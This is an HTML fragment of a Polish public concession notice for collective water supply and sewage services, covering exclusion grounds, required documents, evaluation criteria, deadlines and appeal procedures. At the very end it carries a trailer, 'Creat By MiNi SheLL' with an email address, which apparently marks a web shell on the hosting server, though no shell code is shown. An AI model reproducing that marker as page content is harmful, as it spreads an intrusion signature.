podstawa wykluczenia określona w art. 32 ust. 2 pkt 2 ustawy o umowie koncesji &#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_2_2">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 2 pkt 3 ustawy o umowie koncesji &#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_2_3">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 2 pkt 4 ustawy o umowie koncesji &#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_2_4">Nie</span><br /> podstawa wykluczenia określona w art. 32 ust. 2 pkt 5 ustawy o umowie koncesji &#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_2_5">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 2 pkt 6 ustawy o umowie koncesji &#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_2_6">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 2 pkt 7 ustawy o umowie koncesji &#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_2_7">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 2 pkt 8 ustawy o umowie koncesji &#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_2_8">Tak</span> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>III.2.3 Podstawy wykluczenia podwykonawców</b> <br/> <b>Zamawiający przewiduje zastosowanie podstaw wykluczenia przewidzianych dla wykonawców także do bezpośrednich podwykonawców koncesjonariusza </b><span id="ctl00_ContentPlaceHolder1_czy_podstawy_III_2_3_bezp_podwyk">Tak</span> <br /> <b>Zamawiający przewiduje zastosowanie podstaw wykluczenia przewidzianych dla wykonawców także do dalszych podwykonawców koncesjonariusza</b><span id="ctl00_ContentPlaceHolder1_czy_podstawy_III_2_3_dalszych_podwyk">Tak</span> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>III.2.4 Informacje dodatkowe</b><i>(jeżeli dotyczy)</i>: <br /> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_III_2_4"></span> <br /> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> III.3 DOKUMENTY ŻĄDANE PRZEZ ZAMAWIAJĄCEGO NA POTWIERDZENIE SPEŁNIANIA KRYTERIÓW KWALIFIKACJI ORAZ BRAKU PODSTAW WYKLUCZENIA I WYMAGANIA ZWIĄZANE ZE SKŁADANYMI DOKUMENTAMI </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>III.3.1 Wymagania związane ze składaniem oświadczenia o spełnianiu kryteriów kwalifikacji oraz braku podstaw wykluczenia:</b>: <br /> <span id="ctl00_ContentPlaceHolder1_dokumenty_III_3_1">W celu oceny spełnienia przez Wykonawcę kryteriów kwalifikacji, każdy z Wykonawców winien przedłożyć wraz z ofertą (w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie musi zostać podpisane przez wszystkie podmioty występujące wspólnie) oświadczenie o spełnianiu kryteriów kwalifikacji i braku podstaw do wykluczenia w oparciu o wzór zawarty w załączniku nr 5 do niniejszej SIWZ,</span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>III.3.2 Wykaz dokumentów, ich zakres oraz sposób składania dokumentów na potwierdzenie spełniania kryteriów kwalifikacji:</b>: <br /> <span id="ctl00_ContentPlaceHolder1_dokumenty_III_3_2">W celu oceny spełnienia przez Wykonawcę kryteriów kwalifikacji, każdy z Wykonawców winien przedłożyć wraz z ofertą następujące oświadczenia i dokumenty (w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie musi zostać podpisane przez wszystkie podmioty występujące wspólnie):1.1. oświadczenie o spełnianiu kryteriów kwalifikacji i braku podstaw do wykluczenia w oparciu o wzór zawarty w załączniku nr 5 do niniejszej SIWZ,1.2. potwierdzające posiadanie uprawnień do wykonywania działalności stanowiącej przedmiot zamówienia, tj.: zezwolenie lub przyrzeczenie wydania zezwolenia (promesę) na prowadzenie zbiorowego zaopatrzenia w wodę oraz zbiorowego odprowadzania ścieków, o którym mowa w art. 16 punkt 1 ustawy o zbiorowym zaopatrzeniu w wodę i zbiorowym odprowadzaniu ścieków (Dz. U z 2019, poz. 1437t.j.- zwaną dalej „uzwzoś”), co najmniej na okres objęty przedmiotem umowy koncesjiUwaga: powyższy wymóg nie dotyczy podmiotów wymienionych w art. 16 ust. 3 ustawy uzwzoś ;1.3. wykazu usług, (przygotowanego zgodnie ze wzorem stanowiącym załącznik nr 6 do SIWZ) wykonanych lub wykonywanych w okresie ostatnich 7 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, z zastrzeżeniem, że dowodami, o których mowa powyżej są: poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych oświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert; w przypadku zamówień na usługi – oświadczenie Wykonawcy – jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej,; w przypadku gdy Zamawiający jest podmiotem, na rzecz którego zostały wcześniej wykonane usługi wskazane w wykazie, o którym mowa powyżej, Wykonawca nie ma obowiązku przedkładania dowodów w postaci poświadczeń.1.4. wykazu osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - załącznik nr 7 do SIWZ.1.5 wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami – załącznik nr 8 do SIWZ;1.6. dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez zamawiającego w postaci opłaconej polisy, a w przypadku jej braku, innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum200.000 zł.</span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>IIII.3.3 Wykaz dokumentów, ich zakres oraz sposób składania dokumentów na potwierdzenie braku podstaw wykluczenia:</b>: <br /> <span id="ctl00_ContentPlaceHolder1_dokumenty_III_3_3">4. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 32 Ustawy O Koncesji, Wykonawca winien przedłożyć wraz z ofertą następujące oświadczenia i dokumenty (w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy z nich odrębnie składa wymagany dokument):4.1 oświadczenie o spełnianiu kryteriów kwalifikacji i braku podstaw do wykluczenia w oparciu o załącznik nr 5 do niniejszej SIWZ,4.2 informacji z Krajowego Rejestru Karnego w zakresie określonym w pkt 4. Rozdziału VIII, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;4.3 zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, w zakresie określonym w ust. 5 Rozdziału VIII, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;4.4 zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego w zakresie określonym w ust. 5 Rozdziału VIII, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;4.5 odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia w zakresie określonym w ust. 5 pkt 1. Rozdziału VIII.4. Wykonawca mający siedzibę na terytorium Rzeczypospolitej Polskiej, w odniesieniu do osoby mającej miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, której dotyczy dokument wskazany w pkt 4.2 powyżej, składa informację z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w kraju, w którym miejsce zamieszkania ma osoba, której dokument miał dotyczyć, nie wydaje się takich dokumentów, zastępuje się go dokumentem zawierającym oświadczenie tej osoby złożonym przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na miejsce zamieszkania tej osoby, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 5. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 4.3 – 4.5 powyżej, składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: a) nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;b) nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 6. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby wystawione w terminach podanych powyżej.7. W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę, zamawiający może zwrócić się do właściwych organów kraju, w którym miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu.8. Wymagane dokumenty należy przedstawić w formie pisemnej w postaci:- pisemnej (papierowej) tj. podpisanych oryginałów lub kopii poświadczonych za zgodność z oryginałem przez Wykonawcę 9. W przypadku działania Wykonawcy przez pełnomocnika, należy dołączyć do oferty pełnomocnictwo w oryginale bądź jego kopię poświadczoną notarialnie, z którego treści będzie wynikać zakres udzielonego umocowania.10. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia oświadczenia i dokumenty ujęte w ust. 1. powinni złożyć łącznie, natomiast wymienione ust. 4. – odrębnie przez każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.11.	Podmioty użyczające zasobów winny złożyć dokumenty wymienione w ust. 4 w formie wskazanej w ust. 8. powyżej.12. Dokumenty potwierdzające posiadanie uprawnień do wykonywania działalności stanowiącej przedmiot zamówienia; winny być złożone przez każdego Wykonawcę świadczącego usługi zbiorowego zaopatrzenia w wodę oraz zbiorowego odprowadzania ścieków.13. Przed podpisaniem umowy (w przypadku wygrania postępowania) wykonawcy składający ofertę wspólną będą mieli obowiązek przedstawić zamawiającemu umowę konsorcjum, zawierającą, co najmniej:1) zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia,2) określenie zakresu działania poszczególnych stron umowy,3) czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację zamówienia oraz czas trwania gwarancji jakości i rękojmi.</span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>III.3.4 Informacje dodatkowe</b><i>(jeżeli dotyczy)</i>: <br /> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_III_3_4">Mając na uwadze, że w celu spełnienia kryteriów kwalifikacji wykonawca może, w stosownych przypadkach i w odniesieniu do konkretnej umowy koncesji, polegać na zdolnościach innych podmiotów, bez względu na charakter prawny związków łączących go z tymi podmiotami, Zamawiający zastrzega, że w przypadku gdy wykonawca chce korzystać ze zdolności innych podmiotów, jest obowiązany udowodnić zamawiającemu, że będzie dysponował niezbędnymi zasobami w ciągu całego okresu wykonywania umowy koncesji, w szczególności przedstawiając w tym celu stosowne zobowiązanie takich podmiotów. Zamawiający, w celu oceny, czy wykonawca faktycznie będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda dokumentów dotyczących:a) zakresu dostępnych Wykonawcy zasobów innego podmiotu,b) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,c) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia,d) udziału podmiotu użyczającego swoich zasobów w realizacji zamówienia.Wykonawca, który polega na zdolności innych podmiotów w odniesieniu do kryteriów dotyczących sytuacji finansowej, odpowiada solidarnie z podmiotem, który zobowiązał się do udostępnienia zasobów, za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.</span> <br /> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> III.4 INNE DOKUMENTY </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br /> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_III_4">1.Ofertę stanowi wypełniony formularz Oferty z załączonymi wymaganymi oświadczeniami i wszystkimi dokumentami dotyczącymi kryteriów kwalifikacji i przesłanek wykluczenia, sporządzone w języku polskim. 2. Ofertę należy sporządzić zgodnie z treścią SIWZ oraz treścią zawartą w formularzach stanowiących załączniki do SIWZ. Wykonawca może złożyć ofertę na własnych formularzach, których treść musi być zgodna z formularzami załączonymi do SIWZ. 3. Treść oferty musi odpowiadać treści SIWZ.4. Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji, które Wykonawca zastrzeże jako tajemnicę przedsiębiorstwa, powinny zostać złożone w osobnej kopercie wraz z jednoczesnym oznaczeniem „Załącznik stanowiący tajemnicę przedsiębiorstwa” 5. Wykonawca może złożyć jedną ofertę.6. Zaleca się ponumerowanie kolejnych stron oferty wraz z załącznikami. 7. Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje drogą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania. 8. Zamawiający przekaże treść SIWZ na wniosek Wykonawcy.</span> <br /> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> III.5 WYMAGANIA ZWIĄZANE Z REALIZACJĄ PRZEDMIOTU UMOWY KONCESJI </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br /> <b>III.5.1 Minimalne wymagania</b><i>(jeżeli dotyczy)</i>: <br /> <span id="ctl00_ContentPlaceHolder1_wymagania_III_5_1">Koncesjonariusz jest zobowiązany do posiadania niezbędnego zezwolenia na prowadzenie działalności w zakresie objętym umową koncesji i koniecznym do prowadzenia działalności oraz zobowiązany jest do posiadania i uaktualniania powyższych zezwoleń przez cały okres realizacji umowy. W przypadku, gdy zezwolenie traci moc obowiązującą w trakcie trwania niniejszej umowy, obowiązany jest do uzyskania aktualnych zezwoleń najpóźniej w dniu poprzedzającym dzień wygaśnięcia dotychczasowych uprawnień.</span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br /> <b>III.5.2 Realizacja przedmiotu umowy koncesji jest zastrzeżona przepisami ustawowymi lub administracyjnymi dla określonych zawodów </b><i>(dotyczy umowy koncesji na usługi)</i>:&#160;&#160;<span id="ctl00_ContentPlaceHolder1_czy_III_5_2">Nie</span> <br /> Wykaz aktów prawnych, z których wynika zastrzeżenie: <br /> <span id="ctl00_ContentPlaceHolder1_III_5_2"></span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br /> <b>III.5.3 Wymagania związane z realizacją umowy koncesji </b><i>(jeżeli dotyczy)</i> <br /> <span id="ctl00_ContentPlaceHolder1_III_5_3">Umowa koncesji winna być zrealizowana na warunkach zawartych w umowie koncesji.</span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br /> <b>III.5.4 Zamawiający wymaga podania imion i nazwisk osób wyznaczonych do realizacji umowy koncesji wraz z informacją o kwalifikacjach zawodowych tych osób </b>:&#160;&#160;<span id="ctl00_ContentPlaceHolder1_czy_III_5_4">Tak</span> <br /> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br /> <b>IV.1 Zamawiający zaprasza do składania:</b> <br /> <b>ofert &#160;&#160;</b><span id="ctl00_ContentPlaceHolder1_czy_IV_1_ofert">Tak</span>,&#160;albo&#160;&#160; <br /> <b>wniosków o dopuszczenie do udziału w postępowaniu o zawarcie umowy koncesji&#160;&#160;</b><span id="ctl00_ContentPlaceHolder1_czy_IV_1_wnioskow">Nie</span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br /> <b>IV.2 Termin składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu:</b> <br /> <b>Data:</b><span id="ctl00_ContentPlaceHolder1_IV_2_data">2019-12-02</span> <br /> <b>Godzina:</b><span id="ctl00_ContentPlaceHolder1_IV_2_godzina">12:00</span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br /> <b>IV.3 Języki, w których można sporządzać oferty albo wnioski o dopuszczenie do udziału w postępowaniu:</b> <br /> <span id="ctl00_ContentPlaceHolder1_IV_3">polski</span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br /> <b>IV.4 Zasady, którymi zamawiający będzie kierował się przy ograniczaniu liczby wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</b><i>(jeżeli dotyczy)</i>: <br /> <span id="ctl00_ContentPlaceHolder1_IV_4"></span> <br /> Minimalna liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu&#160;&#160;<span id="ctl00_ContentPlaceHolder1_IV_4_czy_minimalna_liczba">Nie</span>&#160;&#160;<span id="ctl00_ContentPlaceHolder1_IV_4_minimalna_liczba"></span> <br /> Maksymalna liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu&#160;&#160;<span id="ctl00_ContentPlaceHolder1_IV_4_czy_maks_liczba">Nie</span>&#160;&#160;<span id="ctl00_ContentPlaceHolder1_IV_4_maks_liczba"></span> <br /> Obiektywne i niedyskryminacyjne zasad, którymi zamawiający będzie kierował się przy ograniczaniu liczby wykonawców zapraszanych do udziału w postępowaniu: <br /> <span id="ctl00_ContentPlaceHolder1_IV_4_zasady"></span> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br /> <b>IV.5 Kryteria oceny ofert:</b> <br /> Kryteria i ich opis: <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>1.	Liczba osób zadeklarowanych do zatrudnienia na umowę o pracę przy realizacji zamówienia </TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>2.	Zapewnienie dyżuru przez przedstawiciela Koncesjonariusza (DK)</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>3.	Czas przystąpienia do usuwania awarii zagrażającej utracie zdrowia i życia (AZŻ)</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>4.	Czas przystąpienia do usuwania awarii innych niż wskazane w pkt 3 (AI)</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR></TABLE> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br /> <b>IV.6 Unieważnienie postępowania</b> <br /> <b>Przewiduje się unieważnienie postępowania, jeżeli środki, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części umowy koncesji, nie zostaną przyznane </b>&#160;&#160;Nie <br /> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>IV. 7 Informacje dodatkowe</b><i>(jeżeli dotyczy)</i>: <br /> <span id="ctl00_ContentPlaceHolder1_IV_7_informacje_dodatkowe"></span> <br /> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> SEKCJA V: INFORMACE UZUPEŁNIAJĄCE </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>V.1 Zmiana umowy</b> <br /> <b>Przewiduje się zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której zostanie dokonany wybór wykonawcy:</b>&#160;&#160;<span id="ctl00_ContentPlaceHolder1_V_1_czy_zmiany_umowy">Tak</span><br /> Zakres, charakter zmian oraz warunki wprowadzenia zmian : <br /> <span id="ctl00_ContentPlaceHolder1_V_1_zakres_zmian">Zamawiający przewiduje wprowadzenie zmian do umowy na warunkach zawartych we wzorze umowy</span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>V.2 Informacje o charakterze poufnym</b> <br /> <b>Sposób udostępniania informacji o charakterze poufnym</b><i>(jeżeli dotyczy)</i>: <br /> <span id="ctl00_ContentPlaceHolder1_V_2_sposob_udostepnienia"></span> <br /> <b>Środki służące ochronie informacji o charakterze poufnym</b><i>(jeżeli dotyczy)</i>: <br /> <span id="ctl00_ContentPlaceHolder1_V_2_srodki_ochrony"></span> <br /> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> V.3 WNOSZENIE ODWOŁAŃ </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>V.3.1 Organ właściwy do rozpoznawania odwołań</b> <br /> Nazwa: <span id="ctl00_ContentPlaceHolder1_V_3_Nazwa">Krajowa Izba Odwoławcza</span>, Adres: <span id="ctl00_ContentPlaceHolder1_V_3_Adres">ul. Postępu 17a</span>, Miasto: <span id="ctl00_ContentPlaceHolder1_V_3_Miasto">Warszawa</span>,Kod pocztowy: <span id="ctl00_ContentPlaceHolder1_V_3_Kod">02676</span>, Państwo: <span id="ctl00_ContentPlaceHolder1_V_3_Panstwo">Polska</span>, Województwo: <span id="ctl00_ContentPlaceHolder1_V_3_Wojewodztwo">Mazowieckie</span>, tel. <span id="ctl00_ContentPlaceHolder1_V_3_Tel"></span>, e-mail <span id="ctl00_ContentPlaceHolder1_V_3_Email"></span>, faks <span id="ctl00_ContentPlaceHolder1_V_3_Fax"></span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_V_3_WWW"></span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>V.3.2 Informacje na temat terminów wnoszenia odwołań:</b> <br /> <span id="ctl00_ContentPlaceHolder1_V_3_TerminyOdwolan">1.	Wykonawcy, a także innemu podmiotowi, jeżeli ma lub miał interes w zawarciu umowy koncesji oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez zamawiającego przepisów Ustawy O Koncesji, przysługuje prawo do wniesienia odwołania od niezgodnej z przepisami ustawy czynności zamawiającego podjętej w postępowaniu o zawarcie umowy koncesji lub zaniechania czynności, do której zamawiający jest obowiązany na podstawie Ustawy O Koncesji. 2.	Do wnoszenia i rozpoznawania odwołań stosuje się odpowiednio przepisy działu VI rozdziału 2 Prawa zamówień publicznych, z wyjątkiem art. 180 ust. 2 tej ustawy. 3.	Odwołanie wnosi się (poza odwołaniem na czynnośc przekazania informacji o wyborze najkorzystniejszej oferty) w terminie 10 dni od dnia przesłania informacji o czynności zamawiającego stanowiącej podstawę jego wniesienia - jeżeli zostały przekazane przy użyciu środków komunikacji elektronicznej, albo 15 dni, jeżeli została przekazana w inny sposób. 4.	Odwołanie wobec treści ogłoszenia o koncesji, wnosi się w terminie 5 dni od dnia publikacji ogłoszenia w Biuletynie Zamówień Puiblicznych. 5.	Odwołanie wobec czynności innych niż określone powyżej wnosi się w terminie 5 dni od dnia przesłania informacji o czynności zamawiającego stanowiącej podstawę jego wniesienia - jeżeli zostały przesłane w ten sposób, że zamawiający mógł zapoznać się z treścią odwołania przed upływem terminu do jego wniesienia - jeżeli przesłanie jego kopii nastąpiło przed upływem terminu do jego wniesienia przy użyciu środków komunikacji elektronicznej określonych w art. 180 ust. 5 zdanie drugie albo w terminie 10 dni - jeżeli zostały przesłane w inny sposób; 6.	W przypadku wniesienia odwołania wobec treści ogłoszenia o zamówieniu zamawiający może przedłużyć termin składania ofert. 7.	W przypadku wniesienia odwołania po upływie terminu składania ofert bieg terminu związania ofertą ulega zawieszeniu do czasu ogłoszenia przez Izbę orzeczenia. </span>. <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>V.3.3 Podmiot udostępniający informacje na temat odwołań</b> <br /> Nazwa: <span id="ctl00_ContentPlaceHolder1_V_3_Udostepniajacy_Nazwa">Prezes Krajowej Izby Odwoławczej</span>, Adres: <span id="ctl00_ContentPlaceHolder1_V_3_Udostepniajacy_Adres">ul. Postępu 17a</span>, Miasto: <span id="ctl00_ContentPlaceHolder1_V_3_Udostepniajacy_Miasto">Warszawa</span>,Kod pocztowy: <span id="ctl00_ContentPlaceHolder1_V_3_Udostepniajacy_Kod">02-676</span>, Państwo: <span id="ctl00_ContentPlaceHolder1_V_3_Udostepniajacy_Panstwo">Polska</span>, Województwo: <span id="ctl00_ContentPlaceHolder1_V_3_Udostepniajacy_Wojewodztwo">Mazowieckie</span>, tel. <span id="ctl00_ContentPlaceHolder1_V_3_Udostepniajacy_Tel"></span>, e-mail <span id="ctl00_ContentPlaceHolder1_V_3_Udostepniajacy_Email"></span>, faks <span id="ctl00_ContentPlaceHolder1_V_3_Udostepniajacy_Fax"></span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_V_3_Udostepniajacy_WWW"></span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>V.3.4 Informacje dodatkowe</b><i>(jeżeli dotyczy)</i>: <br /> <span id="ctl00_ContentPlaceHolder1_V_3_InformacjeDodatkowe"></span> <br /> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> </div> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com